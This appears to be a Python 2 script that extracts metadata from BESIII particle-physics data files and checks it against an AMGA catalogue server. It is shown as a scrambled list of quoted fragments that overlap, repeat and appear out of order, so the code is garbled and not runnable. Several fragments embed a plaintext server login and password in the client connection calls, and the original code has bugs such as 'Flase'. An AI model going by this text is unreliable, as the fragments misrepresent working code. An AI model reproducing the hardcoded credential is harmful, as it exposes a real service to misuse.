"#for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print",
"resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries",
"not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if",
"link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat)",
"runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] =",
"entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item #",
"for format in srcformat: #if format of file is in srcformat if file.endswith(format):",
"def getAttributes(self): #store all attributes attributes = {} expRes = {} lfnInfo =",
"by calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print \"Can't get",
"runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance",
"if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] =",
"file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming rule,",
"gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId",
"if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return",
"runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes",
"print \"Content of this file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile)",
"type == \"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return runId else:",
"class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return repr(\"the File's",
"in filename is same as resonance that get from ExpSearch if expRes[\"resonance\"] ==",
"entries is None: print \"ExpSearch directory is empty, please run createBesDir first\" return",
"= attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in",
"= getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function",
"string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res is",
"of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId",
"attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes =",
"attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are",
"%s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of",
"= client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get",
"attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error",
"attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\")",
"the filename,runL = runH = %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"])",
"dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag =",
"= splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only has one runId",
"in resonance List,add it to resList if result[4] not in resList: resList.append(result[4]) #only",
"#for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId",
"mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry =",
"runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is equal to",
"#set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId",
"= expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else:",
"ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename is %d,in",
"/bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return",
"while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print \"ExpSearch directory",
"+ getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType is stored in",
"resonance List,add it to resList if result[4] not in resList: resList.append(result[4]) #only including",
"return \"error\" #set values of attribute status #-1 <=> value of status is",
"value of streamId is null #null <=> value of Description is null attributes[\"status\"]",
"string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list =",
"entry = client.getEntry()[0] if entries is None: print \"ExpSearch directory is empty, please",
"end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time() print \"655:\",str(start -",
"in srcformat: #if format of file is in srcformat if file.endswith(format): flag =",
"eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client",
"if eventType == result[0]: return True return False #judge format of file class",
"to runH,this file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId",
"runids: #check all runid whether between runfrm and runto of each entry #under",
"null #-1 <=> value of status is null #-1 <=> value of streamId",
"%s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename is %d,in jobOptions is",
"not None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds according ','",
"in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client",
"return attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time()",
"File's format is not \",self.format) #type of srcformat is list,it includes many formats",
"expRes = {} runIds = [] #change the .dst file to .root file",
"from ROOT import gROOT from amga import mdclient,mdinterface import string import re import",
"lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH",
"= {} expNumList = [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client",
"return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by",
"#-1 <=> value of streamId is null #null <=> value of Description is",
"runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH ==",
"raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get",
"including one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several",
"of each entry if eventType == result[0]: return True return False #judge format",
"= lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is not stored in",
"runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");')",
"calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of",
"result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"]",
"null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function",
"= dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes = {}",
"stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1 <=> value",
"\"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid",
"runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] =",
"os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile)",
"calling getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"]",
"print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else:",
"[] #change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000:",
"filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to",
"pat.search(str2) if list is not None: #get a string like:-10513,0,-10629 runIds = list.group()",
"= eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType",
"string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2]",
"= {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch",
"Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId =",
"%s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute",
"=(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader*",
"result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList = []",
"to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList",
"== False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if",
"format is not \",self.format) #type of srcformat is list,it includes many formats def",
"#file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object):",
"client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in",
"== False: print \"Can't get expNum and resonance of this file\" return \"error\"",
"ROOT import gROOT from amga import mdclient,mdinterface import string import re import time",
"of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance",
"= DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start = time.time() obj",
"attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"]",
"one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including several",
"False #only including one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else:",
"Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile",
"= attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"])",
"flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then",
"lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes",
"for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return",
"import ROOT from ROOT import gROOT from amga import mdclient,mdinterface import string import",
"1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has something wrong to",
"= attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if",
"changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return \"error\" else:",
"re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None: #get a string like:-10513,0,-10629",
".root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is",
"python # -*- coding:utf-8 -*- # author: linlei #for data/all name of file",
"gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader",
"calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum",
"= [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get",
"expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"]",
"them from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is",
"and resonance from ExpSearch according runids def getExpRes(runids): entries = [] expRes =",
"gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] =",
"<=> value of streamId is null #null <=> value of Description is null",
"result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions def",
"name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of",
"if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these",
"#resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self):",
"runid of rootfile with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get",
"runfrm and runto,and expNum isn't in expNumList #add this expNum to expNumList if",
"None: return res.group() #Get expNum and resonance from ExpSearch according runids def getExpRes(runids):",
"are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare",
"#get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading",
"runid between runfrm and runto,and expNum isn't in expNumList #add this expNum to",
"file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this",
"= checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise",
"print \"Can't get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] =",
"client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each entry if eventType",
"<=> value of status is null #-1 <=> value of streamId is null",
"getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get",
"-*- # author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim",
"is None: print \"ExpSearch directory is empty, please run createBesDir first\" return Flase",
"res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is",
"changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if",
"str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType",
"several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for",
"start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start =",
"filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the",
"def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by",
"RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename",
"getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if",
"rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for",
".dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag",
"entries = [] expRes = {} expNumList = [] resList = [] #print\"runids\",runids",
"= pat.search(str2) if list is not None: #get a string like:-10513,0,-10629 runIds =",
"filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename if",
"attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is",
"from JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat =",
"Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print \"Can't",
"runids def getExpRes(runids): entries = [] expRes = {} expNumList = [] resList",
"in runids: #check all runid whether between runfrm and runto of each entry",
"amga import mdclient,mdinterface import string import re import time #get number behiend string",
"of status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes",
"== lfnInfo[\"runH\"]: #if runId in filename also is equal to runId in rootfile",
"like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming rule, #file",
"if type == \"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return runId",
"runIds,get them from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result",
"JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree*",
"mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry",
"#split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\"",
"to change their style to integer for i in items: if i!='0': runid=abs(string.atoi(i))",
"attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print",
"to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't",
"#has several resonances,may be has something wrong to this file print \"serveral resonance:\",resList",
"is stored in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client =",
"in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"]",
"lfnInfo[\"runH\"]: #if runId in filename also is equal to runId in rootfile if",
"values of attribute status #-1 <=> value of status is null attributes[\"status\"] =",
"%s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error",
"runIds = [] #change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile)",
"runto = string.atoi(result[2]) for runid in runids: #check all runid whether between runfrm",
"getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");')",
"file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree*",
"expRes = {} lfnInfo = {} runIds = [] #change the .dst file",
"#add this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of",
"branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);')",
"the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content",
"client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry)",
"entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and",
"by \".\" #get lfn lfn = filename.split('.')[0] return lfn #get size of dst",
"each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item",
"expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False:",
"lfnInfo = {} runIds = [] #change the .dst file to .root file",
"resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is",
"name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def",
"%d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in",
"attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by calling",
"includes many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in",
"evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version",
"Flase for item in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance'])",
"[] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not",
"print \"serveral resonance:\",resList return False #only including one expNum if len(expNumList) == 1:",
"= {} items = lfn.split(\"_\") if type == \"all\": if items[2] == \"All\":",
"i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set",
"the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several",
"if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn",
"getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if",
"Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"]",
"flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get",
"[] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog",
"lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by",
"getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType is stored in eventTypeList",
"eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s",
"= checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete",
"function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"]) runL",
"\"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with",
"else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3])",
"commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get",
"= format.search(expNum) if res is not None: return res.group() #Get expNum and resonance",
"isn't in expNumList #add this expNum to expNumList if result[3] not in expNumList:",
"#store all attributes attributes = {} expRes = {} runIds = [] #change",
"if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in",
"null #null <=> value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] =",
"has something wrong to this file print \"serveral resonance:\",resList return False #only including",
"are null #-1 <=> value of status is null #-1 <=> value of",
"attributes = {} expRes = {} lfnInfo = {} runIds = [] #change",
"def getExpRes(runids): entries = [] expRes = {} expNumList = [] resList =",
"filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in",
"of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of",
"if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance",
"= getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by calling getLFN",
"= items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result",
"== lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in",
"file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag =",
"of this file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize",
"#get filesize by calling getFileSize function #get name by calling getLFN function attributes[\"fileSize\"]",
"checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile)",
"a string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style",
"gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId())",
"%d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst",
"items = lfn.split(\"_\") if type == \"all\": if items[2] == \"All\": runId =",
"#split runIds according ',' items=runIds.split(',') #members' style in items is string,we need to",
